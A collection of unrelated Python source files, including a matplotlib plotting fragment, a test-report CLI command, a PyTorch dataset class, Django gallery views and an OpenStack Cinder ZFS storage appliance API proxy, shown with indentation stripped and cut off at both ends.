ax1.fill([-0.155, -0.115, -0.115, -0.155, -0.155], [0.78, 0.78, 0.98, 0.98, 0.78], 'w', ec='none', clip_on=False, transform=ax1.transAxes, zorder=np.inf)
fig.subplots_adjust(wspace=0, hspace=0.205)
# hide the spines between ax and ax2
ax1.spines['bottom'].set_visible(False)
ax2.spines['top'].set_visible(False)
ax1.xaxis.tick_top()
ax1.tick_params(which='both', top=False, labeltop=False)
ax2.xaxis.tick_bottom()
# ylim
ax1.set_ylim(0.185, 6.2e+2)
ax2.set_ylim(2e-3, 0.803e-2)
# Place cut-out slanted lines
mew = 0.8
q = 22*np.pi/180
offset = 0.33
x = np.linspace(offset*np.pi, (2 - offset)*np.pi, 100)
y = np.sin(x)
X, Y = np.array([[np.cos(q), -np.sin(q)], [np.sin(q), np.cos(q)]]) @ np.array([x, y])
X -= np.mean(X)
Y -= np.mean(Y)
scale = 0.01
ex = 0.0024
for xx in (0, 1):
ax1.plot(xx + scale*X, (0 - ex) + scale*Y, 'k-',
lw=mew, transform=ax1.transAxes, zorder=1e+6, clip_on=False)
ax2.plot(xx + scale*X, (1 + ex) + scale*(n_axis - 1)*Y, 'k-',
lw=mew, transform=ax2.transAxes, zorder=1e+6, clip_on=False)
# Clean up
if xx == 1:
ax1.plot(xx + scale*X + 0.001, (0 - ex) + scale*Y - 0.008, 'w-', alpha=1,
lw=mew, transform=ax1.transAxes, zorder=1e+6, clip_on=False)
# old
#d = 0.65 # proportion of vertical to horizontal extent of the slanted line
#kwargs = dict(marker=[(-1, -d), (1, d)], markersize=8.5,
# linestyle='none', color='k', mec='k', mew=mew, clip_on=False)
#ax1.plot([0, 1], [0, 0], transform=ax1.transAxes, **kwargs)
#ax2.plot([0, 1], [1, 1], transform=ax2.transAxes, **kwargs)
# Clean a = a_begin curve at the lower right
ax2.plot([0.996, 1.004, 1.004], [-0.035, -0.035, 0.06], 'w-', lw=1.2, transform=ax2.transAxes, clip_on=False, zorder=-5, alpha=1)
# Clean a = a_begin curve at the lower left
ax2.plot([-0.004]*2, [0.6, 0.8], 'w-', lw=1.2, transform=ax2.transAxes, clip_on=False, zorder=-5, alpha=1)
# Clean a = 0.09 curve at the lower left
ax1.plot([-0.004]*2, [0.08, 0.15], 'w-', lw=1.2, transform=ax1.transAxes, clip_on=False, zorder=-5, alpha=1)
# Draw extra part of spine with tick at lower left
ax2.tick_params(which='both', labelleft=False)
ax2.plot(
[ax2.get_xlim()[0]]*2,
[ax2.get_ylim()[0], 1e-3],
'k-', lw=mew, clip_on=False,
)
ax2.plot(
[ax2.get_xlim()[0], 0.907*ax2.get_xlim()[0]],
[1e-3]*2,
'k-', lw=mew, clip_on=False,
)
ax2.text(0.804*ax2.get_xlim()[0], 0.9356*1e-3, r'$10^{-3}$', ha='right', va='center')
# Extra legend
x_leg_start = 0.3445 + jumpx
legend2 = ax2.legend(
(
ax2.plot(1, 1, '-' , color='w')
+ ax2.plot(1, 1, '--' , color='k')
+ ax2.plot(1, 1, ':', lw=1, color='k')
),
(r'\CONCEPTONE{}', r'\GADGETTWO{}', r'linear'),
loc=(x_leg_start, 0.228 + jumpy), framealpha=0.6,
)
ax2.add_artist(legend1)
ax2.add_artist(legend2)
# Rainbow
y_bot = 1.8935
y_top = y_bot + 0.0862
offsetx = 0.0123
dx = 0.01102*8/len(z_values_all)
for i in range(len(z_values_all)):
color = f'C{i-1}'
if i == 0:
color = f'C{len(z_values_all)-1}'
ax2.fill(
[
x_leg_start + offsetx + dx*i*0.995,
x_leg_start + offsetx + dx*(i+1)/0.995,
x_leg_start + offsetx + dx*(i+1)/0.995,
x_leg_start + offsetx + dx*i*0.995,
x_leg_start + offsetx + dx*i*0.995,
],
np.array([y_bot, y_bot, y_top, y_top, y_bot]) + jumpy,
color, alpha=1.0,
ec='none', transform=ax2.transAxes, zorder=np.inf, clip_on=False,
)
# Remove small legend bits
ax2.plot([0.443 + jumpx]*2, np.array([0.5, 1.5]) + jumpy, 'w', transform=ax2.transAxes, zorder=np.inf, clip_on=False, alpha=1)
ax2.set_xticks([0.1, 1])
ax2.set_xticklabels([r'$0.1$', r'$1$'])
# Save
cropsave(fig, '../figure/abspower.pdf') # no tight_layout() or bbox_inches()
|
python
|
import sys
import errno
from contextlib import contextmanager
from lemoncheesecake.cli.command import Command
from lemoncheesecake.cli.utils import auto_detect_reporting_backends, add_report_path_cli_arg, get_report_path
from lemoncheesecake.reporting import load_report
from lemoncheesecake.reporting.backends.console import print_report_as_test_run
from lemoncheesecake.reporting.console import print_report
from lemoncheesecake.filter import add_result_filter_cli_args, make_result_filter
@contextmanager
def ignore_broken_pipe():
try:
yield
# catch IOError + check errno (instead of simply catching BrokenPipeError on Python 3)
# to be Python 2 compatible
except IOError as excp:
if excp.errno == errno.EPIPE:
# Broken pipe (example: "lcc report | head"), in that case, simply exit gracefully
# We just close stderr to avoid Python warnings about ignored exception at the end of the
# command. This behavior occurs with Python3 (not 2), see :
# https://stackoverflow.com/questions/26692284/how-to-prevent-brokenpipeerror-when-doing-a-flush-in-python
# please note that the ignored exception is related to the stream wrapper of colorama
sys.stderr.close()
else:
# otherwise, re-raise
raise
class ReportCommand(Command):
def get_name(self):
return "report"
def get_description(self):
return "Display a report"
def add_cli_args(self, cli_parser):
add_result_filter_cli_args(cli_parser)
group = cli_parser.add_argument_group("Display report")
add_report_path_cli_arg(group)
group.add_argument(
"--short", "-s", action="store_true", required=False,
help="Display report as lcc run display test results"
)
group.add_argument(
"--debug", "-d", action="store_true", required=False,
help="Show debug logs"
)
group.add_argument(
"--explicit", "-e", action="store_true", required=False,
help="Make all indicators 'explicit' (i.e not only relying on a color-code), "
"will be enforced is stdout is redirected"
)
group.add_argument(
"--max-width", "-w", type=int, required=False,
help="Set a max width for tables (default is current terminal width)"
)
def run_cmd(self, cli_args):
report_path = get_report_path(cli_args)
report = load_report(report_path, auto_detect_reporting_backends())
result_filter = make_result_filter(cli_args)
if cli_args.short:
print_report_as_test_run(report, result_filter)
else:
with ignore_broken_pipe():
print_report(
report, result_filter=result_filter, max_width=cli_args.max_width,
show_debug_logs=cli_args.debug,
explicit=cli_args.explicit or not sys.stdout.isatty()
)
return 0
|
python
|
import torch
from torch.utils.data import Dataset
class GenericDataSet(Dataset):
def __init__(self,
x_inputs: torch.Tensor,
y_targets: torch.Tensor):
if x_inputs.size()[0] != y_targets.size()[0]:
raise Exception("row count of input does not match targets")
self.__inputs = x_inputs
self.__targets = y_targets
def __len__(self):
return len(self.__inputs)
def __getitem__(self, idx):
return self.__inputs[idx], self.__targets[idx]
|
python
|
from abc import ABC, abstractmethod
from typing import Iterable, Mapping, Optional
from bankroll.model import AccountBalance, Activity, Position
from .configuration import Settings
# Offers data about one or more brokerage accounts, initialized with data
# (e.g., exported files) or a mechanism to get the data (e.g., a live
# connection).
class AccountData(ABC):
# Instantiates the receiving type using the information in the given
# settings map.
#
# TODO: Refactor/simplify Configuration class so it can be used in cases
# like this, instead of an unintuitive mapping.
#
# TODO: Hoist `lenient` into a Setting to make this less awkward.
@classmethod
@abstractmethod
def fromSettings(
cls, settings: Mapping[Settings, str], lenient: bool
) -> "AccountData":
pass
# Returns the positions currently held, fetching the data on-demand if
# necessary.
#
# Subclasses are encouraged to memoize this result.
@abstractmethod
def positions(self) -> Iterable[Position]:
pass
# Returns historical account activity, loading it if necessary.
#
# Subclasses are encouraged to memoize this result.
@abstractmethod
def activity(self) -> Iterable[Activity]:
pass
# Returns the cash balances in the account, fetching them if necessary.
#
# Subclasses are encouraged to memoize this result.
@abstractmethod
def balance(self) -> AccountBalance:
pass
|
python
|
"""Integration platform for recorder."""
from __future__ import annotations
from homeassistant.core import HomeAssistant, callback
from . import ATTR_AVAILABLE_MODES, ATTR_MAX_HUMIDITY, ATTR_MIN_HUMIDITY
@callback
def exclude_attributes(hass: HomeAssistant) -> set[str]:
"""Exclude static attributes from being recorded in the database."""
return {
ATTR_MIN_HUMIDITY,
ATTR_MAX_HUMIDITY,
ATTR_AVAILABLE_MODES,
}
|
python
|
from django.shortcuts import render
from .models import Image, Video
from .serializers import ImageSerializer, VideoSerializer
from accounts.permissions import isAdminOrReadOnly
from rest_framework.response import Response
from rest_framework import status
from rest_framework.viewsets import ModelViewSet
# Create your views here.
class ImageView(ModelViewSet):
queryset = Image.objects.all()
serializer_class = ImageSerializer
permission_classes = [isAdminOrReadOnly]
def create(self, request, *args, **kwargs):
"""
add an image link to the gallery
"""
serializer = self.get_serializer(data=request.data)
serializer.is_valid(raise_exception=True)
self.perform_create(serializer)
headers = self.get_success_headers(serializer.data)
return Response(serializer.data, status=status.HTTP_201_CREATED, headers=headers)
def destroy(self, request, *args, **kwargs):
"""
Remove an image from the image gallery
"""
instance = self.get_object()
self.perform_destroy(instance)
return Response("image deleted", status=status.HTTP_204_NO_CONTENT)
class VideoView(ModelViewSet):
queryset = Video.objects.all()
serializer_class = VideoSerializer
permission_classes = [isAdminOrReadOnly]
def create(self, request, *args, **kwargs):
"""
add a video link to the gallery
"""
serializer = self.get_serializer(data=request.data)
serializer.is_valid(raise_exception=True)
self.perform_create(serializer)
headers = self.get_success_headers(serializer.data)
return Response(serializer.data, status=status.HTTP_201_CREATED, headers=headers)
def destroy(self, request, *args, **kwargs):
"""
Remove a video from the video gallery
"""
instance = self.get_object()
self.perform_destroy(instance)
return Response("image deleted", status=status.HTTP_204_NO_CONTENT)
|
python
|
# Copyright (c) 2014, Oracle and/or its affiliates. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
ZFS Storage Appliance Proxy
"""
import json
from oslo_log import log
from cinder import exception
from cinder.i18n import _, _LE
from cinder.volume.drivers.zfssa import restclient
from cinder.volume.drivers.zfssa import webdavclient
LOG = log.getLogger(__name__)
class ZFSSAApi(object):
"""ZFSSA API proxy class"""
def __init__(self):
self.host = None
self.url = None
self.rclient = None
def __del__(self):
if self.rclient and self.rclient.islogin():
self.rclient.logout()
def _is_pool_owned(self, pdata):
"""returns True if the pool's owner is the
same as the host.
"""
svc = '/api/system/v1/version'
ret = self.rclient.get(svc)
if ret.status != restclient.Status.OK:
exception_msg = (_('Error getting version: '
'svc: %(svc)s.'
'Return code: %(ret.status)d '
'Message: %(ret.data)s.')
% {'svc': svc,
'ret.status': ret.status,
'ret.data': ret.data})
LOG.error(exception_msg)
raise exception.VolumeBackendAPIException(data=exception_msg)
vdata = json.loads(ret.data)
return vdata['version']['asn'] == pdata['pool']['asn'] and \
vdata['version']['nodename'] == pdata['pool']['owner']
def set_host(self, host, timeout=None):
self.host = host
self.url = "https://" + self.host + ":215"
self.rclient = restclient.RestClientURL(self.url, timeout=timeout)
def login(self, auth_str):
"""Login to the appliance"""
if self.rclient and not self.rclient.islogin():
self.rclient.login(auth_str)
def get_pool_stats(self, pool):
"""Get space available and total properties of a pool
returns (avail, total).
"""
svc = '/api/storage/v1/pools/' + pool
ret = self.rclient.get(svc)
if ret.status != restclient.Status.OK:
exception_msg = (_('Error Getting Pool Stats: '
'Pool: %(pool)s '
'Return code: %(ret.status)d '
'Message: %(ret.data)s.')
% {'pool': pool,
'ret.status': ret.status,
'ret.data': ret.data})
LOG.error(exception_msg)
raise exception.InvalidVolume(reason=exception_msg)
val = json.loads(ret.data)
if not self._is_pool_owned(val):
LOG.error(_LE('Error Pool ownership: Pool %(pool)s is not owned '
'by %(host)s.'),
{'pool': pool, 'host': self.host})
raise exception.InvalidInput(reason=pool)
avail = val['pool']['usage']['available']
total = val['pool']['usage']['total']
return avail, total
def create_project(self, pool, project, compression=None, logbias=None):
"""Create a project on a pool
Check first whether the pool exists.
"""
self.verify_pool(pool)
svc = '/api/storage/v1/pools/' + pool + '/projects/' + project
ret = self.rclient.get(svc)
if ret.status != restclient.Status.OK:
svc = '/api/storage/v1/pools/' + pool + '/projects'
arg = {
'name': project
}
if compression and compression != '':
arg.update({'compression': compression})
if logbias and logbias != '':
arg.update({'logbias': logbias})
ret = self.rclient.post(svc, arg)
if ret.status != restclient.Status.CREATED:
exception_msg = (_('Error Creating Project: '
'%(project)s on '
'Pool: %(pool)s '
'Return code: %(ret.status)d '
'Message: %(ret.data)s .')
% {'project': project,
'pool': pool,
'ret.status': ret.status,
'ret.data': ret.data})
LOG.error(exception_msg)
raise exception.VolumeBackendAPIException(data=exception_msg)
def create_initiator(self, initiator, alias, chapuser=None,
chapsecret=None):
"""Create an iSCSI initiator."""
svc = '/api/san/v1/iscsi/initiators/alias=' + alias
ret = self.rclient.get(svc)
if ret.status != restclient.Status.OK:
svc = '/api/san/v1/iscsi/initiators'
arg = {
'initiator': initiator,
'alias': alias
}
if chapuser and chapuser != '' and chapsecret and chapsecret != '':
arg.update({'chapuser': chapuser,
'chapsecret': chapsecret})
ret = self.rclient.post(svc, arg)
if ret.status != restclient.Status.CREATED:
exception_msg = (_('Error Creating Initiator: '
'%(initiator)s on '
'Alias: %(alias)s '
'Return code: %(ret.status)d '
'Message: %(ret.data)s .')
% {'initiator': initiator,
'alias': alias,
'ret.status': ret.status,
'ret.data': ret.data})
LOG.error(exception_msg)
raise exception.VolumeBackendAPIException(data=exception_msg)
def add_to_initiatorgroup(self, initiator, initiatorgroup):
"""Add an iSCSI initiator to initiatorgroup"""
svc = '/api/san/v1/iscsi/initiator-groups/' + initiatorgroup
ret = self.rclient.get(svc)
if ret.status != restclient.Status.OK:
svc = '/api/san/v1/iscsi/initiator-groups'
arg = {
'name': initiatorgroup,
'initiators': [initiator]
}
ret = self.rclient.post(svc, arg)
if ret.status != restclient.Status.CREATED:
exception_msg = (_('Error Adding Initiator: '
'%(initiator)s on group'
'InitiatorGroup: %(initiatorgroup)s '
'Return code: %(ret.status)d '
'Message: %(ret.data)s .')
% {'initiator': initiator,
'initiatorgroup': initiatorgroup,
'ret.status': ret.status,
'ret.data': ret.data})
LOG.error(exception_msg)
raise exception.VolumeBackendAPIException(data=exception_msg)
else:
val = json.loads(ret.data)
inits = val['group']['initiators']
if inits is None:
exception_msg = (_('Error Getting Initiators: '
'InitiatorGroup: %(initiatorgroup)s '
'Return code: %(ret.status)d '
'Message: %(ret.data)s .')
% {'initiatorgroup': initiatorgroup,
'ret.status': ret.status,
'ret.data': ret.data})
LOG.error(exception_msg)
raise exception.VolumeBackendAPIException(data=exception_msg)
if initiator in inits:
return
inits.append(initiator)
svc = '/api/san/v1/iscsi/initiator-groups/' + initiatorgroup
arg = {
'initiators': inits
}
ret = self.rclient.put(svc, arg)
if ret.status != restclient.Status.ACCEPTED:
exception_msg = (_('Error Adding Initiator: '
'%(initiator)s on group'
'InitiatorGroup: %(initiatorgroup)s '
'Return code: %(ret.status)d '
'Message: %(ret.data)s .')
% {'initiator': initiator,
'initiatorgroup': initiatorgroup,
'ret.status': ret.status,
'ret.data': ret.data})
LOG.error(exception_msg)
raise exception.VolumeBackendAPIException(data=exception_msg)
def create_target(self, alias, interfaces=None, tchapuser=None,
tchapsecret=None):
"""Create an iSCSI target.
interfaces: an array with network interfaces
tchapuser, tchapsecret: target's chapuser and chapsecret
returns target iqn
"""
svc = '/api/san/v1/iscsi/targets/alias=' + alias
ret = self.rclient.get(svc)
if ret.status != restclient.Status.OK:
svc = '/api/san/v1/iscsi/targets'
arg = {
'alias': alias
}
if tchapuser and tchapuser != '' and tchapsecret and \
tchapsecret != '':
arg.update({'targetchapuser': tchapuser,
'targetchapsecret': tchapsecret,
'auth': 'chap'})
if interfaces is not None and len(interfaces) > 0:
arg.update({'interfaces': interfaces})
ret = self.rclient.post(svc, arg)
if ret.status != restclient.Status.CREATED:
exception_msg = (_('Error Creating Target: '
'%(alias)s'
'Return code: %(ret.status)d '
'Message: %(ret.data)s .')
% {'alias': alias,
'ret.status': ret.status,
'ret.data': ret.data})
LOG.error(exception_msg)
raise exception.VolumeBackendAPIException(data=exception_msg)
val = json.loads(ret.data)
return val['target']['iqn']
def get_target(self, alias):
"""Get an iSCSI target iqn."""
svc = '/api/san/v1/iscsi/targets/alias=' + alias
ret = self.rclient.get(svc)
if ret.status != restclient.Status.OK:
exception_msg = (_('Error Getting Target: '
'%(alias)s'
'Return code: %(ret.status)d '
'Message: %(ret.data)s .')
% {'alias': alias,
'ret.status': ret.status,
'ret.data': ret.data})
LOG.error(exception_msg)
raise exception.VolumeBackendAPIException(data=exception_msg)
val = json.loads(ret.data)
return val['target']['iqn']
def add_to_targetgroup(self, iqn, targetgroup):
"""Add an iSCSI target to targetgroup."""
svc = '/api/san/v1/iscsi/target-groups/' + targetgroup
ret = self.rclient.get(svc)
if ret.status != restclient.Status.OK:
svccrt = '/api/san/v1/iscsi/target-groups'
arg = {
'name': targetgroup,
'targets': [iqn]
}
ret = self.rclient.post(svccrt, arg)
if ret.status != restclient.Status.CREATED:
exception_msg = (_('Error Creating TargetGroup: '
'%(targetgroup)s with'
'IQN: %(iqn)s'
'Return code: %(ret.status)d '
'Message: %(ret.data)s .')
% {'targetgroup': targetgroup,
'iqn': iqn,
'ret.status': ret.status,
'ret.data': ret.data})
LOG.error(exception_msg)
raise exception.VolumeBackendAPIException(data=exception_msg)
return
arg = {
'targets': [iqn]
}
ret = self.rclient.put(svc, arg)
if ret.status != restclient.Status.ACCEPTED:
exception_msg = (_('Error Adding to TargetGroup: '
'%(targetgroup)s with'
'IQN: %(iqn)s'
'Return code: %(ret.status)d '
'Message: %(ret.data)s.')
% {'targetgroup': targetgroup,
'iqn': iqn,
'ret.status': ret.status,
'ret.data': ret.data})
LOG.error(exception_msg)
raise exception.VolumeBackendAPIException(data=exception_msg)
def verify_pool(self, pool):
"""Checks whether pool exists."""
svc = '/api/storage/v1/pools/' + pool
ret = self.rclient.get(svc)
if ret.status != restclient.Status.OK:
exception_msg = (_('Error Verifying Pool: '
'%(pool)s '
'Return code: %(ret.status)d '
'Message: %(ret.data)s.')
% {'pool': pool,
'ret.status': ret.status,
'ret.data': ret.data})
LOG.error(exception_msg)
raise exception.VolumeBackendAPIException(data=exception_msg)
def verify_project(self, pool, project):
"""Checks whether project exists."""
svc = '/api/storage/v1/pools/' + pool + '/projects/' + project
ret = self.rclient.get(svc)
if ret.status != restclient.Status.OK:
exception_msg = (_('Error Verifying '
'Project: %(project)s on '
'Pool: %(pool)s '
'Return code: %(ret.status)d '
'Message: %(ret.data)s.')
% {'project': project,
'pool': pool,
'ret.status': ret.status,
'ret.data': ret.data})
LOG.error(exception_msg)
raise exception.VolumeBackendAPIException(data=exception_msg)
def verify_initiator(self, iqn):
"""Check whether initiator iqn exists."""
svc = '/api/san/v1/iscsi/initiators/' + iqn
ret = self.rclient.get(svc)
if ret.status != restclient.Status.OK:
exception_msg = (_('Error Verifying '
'Initiator: %(iqn)s '
'Return code: %(ret.status)d '
'Message: %(ret.data)s.')
% {'initiator': iqn,
'ret.status': ret.status,
'ret.data': ret.data})
LOG.error(exception_msg)
raise exception.VolumeBackendAPIException(data=exception_msg)
def verify_target(self, alias):
"""Check whether target alias exists."""
svc = '/api/san/v1/iscsi/targets/alias=' + alias
ret = self.rclient.get(svc)
if ret.status != restclient.Status.OK:
exception_msg = (_('Error Verifying '
'Target: %(alias)s '
'Return code: %(ret.status)d '
'Message: %(ret.data)s.')
% {'alias': alias,
'ret.status': ret.status,
'ret.data': ret.data})
LOG.error(exception_msg)
raise exception.VolumeBackendAPIException(data=exception_msg)
def create_lun(self, pool, project, lun, volsize, targetgroup, specs):
"""Create a LUN.
specs - contains volume properties (e.g blocksize, compression).
"""
svc = '/api/storage/v1/pools/' + pool + '/projects/' + \
project + '/luns'
arg = {
'name': lun,
'volsize': volsize,
'targetgroup': targetgroup,
'initiatorgroup': 'com.sun.ms.vss.hg.maskAll'
}
if specs:
arg.update(specs)
ret = self.rclient.post(svc, arg)
if ret.status != restclient.Status.CREATED:
exception_msg = (_('Error Creating '
'Volume: %(lun)s '
'Size: %(size)s '
'Return code: %(ret.status)d '
'Message: %(ret.data)s.')
% {'lun': lun,
'size': volsize,
'ret.status': ret.status,
'ret.data': ret.data})
LOG.error(exception_msg)
raise exception.VolumeBackendAPIException(data=exception_msg)
val = json.loads(ret.data)
return val
def get_lun(self, pool, project, lun):
"""return iscsi lun properties."""
svc = '/api/storage/v1/pools/' + pool + '/projects/' + \
project + "/luns/" + lun
ret = self.rclient.get(svc)
if ret.status != restclient.Status.OK:
exception_msg = (_('Error Getting '
'Volume: %(lun)s on '
'Pool: %(pool)s '
'Project: %(project)s '
'Return code: %(ret.status)d '
'Message: %(ret.data)s.')
% {'lun': lun,
'pool': pool,
'project': project,
'ret.status': ret.status,
'ret.data': ret.data})
LOG.error(exception_msg)
raise exception.VolumeBackendAPIException(data=exception_msg)
val = json.loads(ret.data)
ret = {
'guid': val['lun']['lunguid'],
'number': val['lun']['assignednumber'],
'initiatorgroup': val['lun']['initiatorgroup'],
'size': val['lun']['volsize'],
'nodestroy': val['lun']['nodestroy']
}
if 'origin' in val['lun']:
ret.update({'origin': val['lun']['origin']})
return ret
def set_lun_initiatorgroup(self, pool, project, lun, initiatorgroup):
"""Set the initiatorgroup property of a LUN."""
if initiatorgroup == '':
initiatorgroup = 'com.sun.ms.vss.hg.maskAll'
svc = '/api/storage/v1/pools/' + pool + '/projects/' + \
project + '/luns/' + lun
arg = {
'initiatorgroup': initiatorgroup
}
ret = self.rclient.put(svc, arg)
if ret.status != restclient.Status.ACCEPTED:
LOG.error(_LE('Error Setting Volume: %(lun)s to InitiatorGroup: '
'%(initiatorgroup)s Pool: %(pool)s Project: '
'%(project)s Return code: %(ret.status)d Message: '
'%(ret.data)s.'),
{'lun': lun,
'initiatorgroup': initiatorgroup,
'pool': pool,
'project': project,
'ret.status': ret.status,
'ret.data': ret.data})
def delete_lun(self, pool, project, lun):
"""delete iscsi lun."""
svc = '/api/storage/v1/pools/' + pool + '/projects/' + \
project + '/luns/' + lun
ret = self.rclient.delete(svc)
if ret.status != restclient.Status.NO_CONTENT:
LOG.error(_LE('Error Deleting Volume: %(lun)s to Pool: %(pool)s '
'Project: %(project)s Return code: %(ret.status)d '
'Message: %(ret.data)s.'),
{'lun': lun,
'pool': pool,
'project': project,
'ret.status': ret.status,
'ret.data': ret.data})
def create_snapshot(self, pool, project, lun, snapshot):
"""create snapshot."""
svc = '/api/storage/v1/pools/' + pool + '/projects/' + \
project + '/luns/' + lun + '/snapshots'
arg = {
'name': snapshot
}
ret = self.rclient.post(svc, arg)
if ret.status != restclient.Status.CREATED:
exception_msg = (_('Error Creating '
'Snapshot: %(snapshot)s on'
'Volume: %(lun)s to '
'Pool: %(pool)s '
'Project: %(project)s '
'Return code: %(ret.status)d '
'Message: %(ret.data)s.')
% {'snapshot': snapshot,
'lun': lun,
'pool': pool,
'project': project,
'ret.status': ret.status,
'ret.data': ret.data})
LOG.error(exception_msg)
raise exception.VolumeBackendAPIException(data=exception_msg)
def delete_snapshot(self, pool, project, lun, snapshot):
"""delete snapshot."""
svc = '/api/storage/v1/pools/' + pool + '/projects/' + \
project + '/luns/' + lun + '/snapshots/' + snapshot
ret = self.rclient.delete(svc)
if ret.status != restclient.Status.NO_CONTENT:
exception_msg = (_('Error Deleting '
'Snapshot: %(snapshot)s on '
'Volume: %(lun)s to '
'Pool: %(pool)s '
'Project: %(project)s '
'Return code: %(ret.status)d '
'Message: %(ret.data)s.')
% {'snapshot': snapshot,
'lun': lun,
'pool': pool,
'project': project,
'ret.status': ret.status,
'ret.data': ret.data})
LOG.error(exception_msg)
raise exception.VolumeBackendAPIException(data=exception_msg)
def clone_snapshot(self, pool, project, lun, snapshot, clone):
"""clone snapshot."""
svc = '/api/storage/v1/pools/' + pool + '/projects/' + \
project + '/luns/' + lun + '/snapshots/' + snapshot + '/clone'
arg = {
'project': project,
'share': clone,
'nodestroy': True
}
ret = self.rclient.put(svc, arg)
if ret.status != restclient.Status.CREATED:
exception_msg = (_('Error Cloning '
'Snapshot: %(snapshot)s on '
'Volume: %(lun)s of '
'Pool: %(pool)s '
'Project: %(project)s '
'Return code: %(ret.status)d '
'Message: %(ret.data)s.')
% {'snapshot': snapshot,
'lun': lun,
'pool': pool,
'project': project,
'ret.status': ret.status,
'ret.data': ret.data})
LOG.error(exception_msg)
raise exception.VolumeBackendAPIException(data=exception_msg)
def set_lun_props(self, pool, project, lun, **kargs):
"""set lun properties."""
svc = '/api/storage/v1/pools/' + pool + '/projects/' + \
project + '/luns/' + lun
if kargs is None:
return
ret = self.rclient.put(svc, kargs)
if ret.status != restclient.Status.ACCEPTED:
exception_msg = (_('Error Setting props '
'Props: %(props)s on '
'Volume: %(lun)s of '
'Pool: %(pool)s '
'Project: %(project)s '
'Return code: %(ret.status)d '
'Message: %(ret.data)s.')
% {'props': kargs,
'lun': lun,
'pool': pool,
'project': project,
'ret.status': ret.status,
'ret.data': ret.data})
LOG.error(exception_msg)
raise exception.VolumeBackendAPIException(data=exception_msg)
def has_clones(self, pool, project, lun, snapshot):
"""Checks whether snapshot has clones or not."""
svc = '/api/storage/v1/pools/' + pool + '/projects/' + \
project + '/luns/' + lun + '/snapshots/' + snapshot
ret = self.rclient.get(svc)
if ret.status != restclient.Status.OK:
exception_msg = (_('Error Getting '
'Snapshot: %(snapshot)s on '
'Volume: %(lun)s to '
'Pool: %(pool)s '
'Project: %(project)s '
'Return code: %(ret.status)d '
'Message: %(ret.data)s.')
% {'snapshot': snapshot,
'lun': lun,
'pool': pool,
'project': project,
'ret.status': ret.status,
'ret.data': ret.data})
LOG.error(exception_msg)
raise exception.VolumeBackendAPIException(data=exception_msg)
val = json.loads(ret.data)
return val['snapshot']['numclones'] != 0
def get_initiator_initiatorgroup(self, initiator):
"""Returns the initiator group of the initiator."""
groups = []
svc = "/api/san/v1/iscsi/initiator-groups"
ret = self.rclient.get(svc)
if ret.status != restclient.Status.OK:
msg = _('Error getting initiator groups.')
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
val = json.loads(ret.data)
for initiator_group in val['groups']:
if initiator in initiator_group['initiators']:
groups.append(initiator_group["name"])
if len(groups) == 0:
LOG.debug("Initiator group not found. Attaching volume to "
"default initiator group.")
groups.append('default')
return groups
class ZFSSANfsApi(ZFSSAApi):
"""ZFSSA API proxy class for NFS driver"""
projects_path = '/api/storage/v1/pools/%s/projects'
project_path = projects_path + '/%s'
shares_path = project_path + '/filesystems'
share_path = shares_path + '/%s'
share_snapshots_path = share_path + '/snapshots'
share_snapshot_path = share_snapshots_path + '/%s'
services_path = '/api/service/v1/services/'
def __init__(self, *args, **kwargs):
super(ZFSSANfsApi, self).__init__(*args, **kwargs)
self.webdavclient = None
def set_webdav(self, https_path, auth_str):
self.webdavclient = webdavclient.ZFSSAWebDAVClient(https_path,
auth_str)
def verify_share(self, pool, project, share):
"""Checks whether the share exists"""
svc = self.share_path % (pool, project, share)
ret = self.rclient.get(svc)
if ret.status != restclient.Status.OK:
exception_msg = (_('Error Verifying '
'share: %(share)s on '
'Project: %(project)s and '
'Pool: %(pool)s '
'Return code: %(ret.status)d '
'Message: %(ret.data)s.')
% {'share': share,
'project': project,
'pool': pool,
'ret.status': ret.status,
'ret.data': ret.data})
LOG.error(exception_msg)
raise exception.VolumeBackendAPIException(data=exception_msg)
def create_snapshot(self, pool, project, share, snapshot):
"""create snapshot of a share"""
svc = self.share_snapshots_path % (pool, project, share)
arg = {
'name': snapshot
}
ret = self.rclient.post(svc, arg)
if ret.status != restclient.Status.CREATED:
exception_msg = (_('Error Creating '
'Snapshot: %(snapshot)s on'
'share: %(share)s to '
'Pool: %(pool)s '
'Project: %(project)s '
'Return code: %(ret.status)d '
'Message: %(ret.data)s.')
% {'snapshot': snapshot,
'share': share,
'pool': pool,
'project': project,
'ret.status': ret.status,
'ret.data': ret.data})
LOG.error(exception_msg)
raise exception.VolumeBackendAPIException(data=exception_msg)
def delete_snapshot(self, pool, project, share, snapshot):
"""delete snapshot of a share"""
svc = self.share_snapshot_path % (pool, project, share, snapshot)
ret = self.rclient.delete(svc)
if ret.status != restclient.Status.NO_CONTENT:
exception_msg = (_('Error Deleting '
'Snapshot: %(snapshot)s on '
'Share: %(share)s to '
'Pool: %(pool)s '
'Project: %(project)s '
'Return code: %(ret.status)d '
'Message: %(ret.data)s.')
% {'snapshot': snapshot,
'share': share,
'pool': pool,
'project': project,
'ret.status': ret.status,
'ret.data': ret.data})
LOG.error(exception_msg)
raise exception.VolumeBackendAPIException(data=exception_msg)
def create_snapshot_of_volume_file(self, src_file="", dst_file=""):
src_file = '.zfs/snapshot/' + src_file
return self.webdavclient.request(src_file=src_file, dst_file=dst_file,
method='COPY')
def delete_snapshot_of_volume_file(self, src_file=""):
return self.webdavclient.request(src_file=src_file, method='DELETE')
def create_volume_from_snapshot_file(self, src_file="", dst_file="",
method='COPY'):
return self.webdavclient.request(src_file=src_file, dst_file=dst_file,
method=method)
def _change_service_state(self, service, state=''):
svc = self.services_path + service + '/' + state
ret = self.rclient.put(svc)
if ret.status != restclient.Status.ACCEPTED:
exception_msg = (_('Error Verifying '
'Service: %(service)s '
'Return code: %(ret.status)d '
'Message: %(ret.data)s.')
% {'service': service,
'ret.status': ret.status,
'ret.data': ret.data})
LOG.error(exception_msg)
raise exception.VolumeBackendAPIException(data=exception_msg)
data = json.loads(ret.data)['service']
LOG.debug('%(service)s service state: %(data)s',
{'service': service, 'data': data})
status = 'online' if state == 'enable' else 'disabled'
if data['<status>'] != status:
exception_msg = (_('%(service)s Service is not %(status)s '
'on storage appliance: %(host)s')
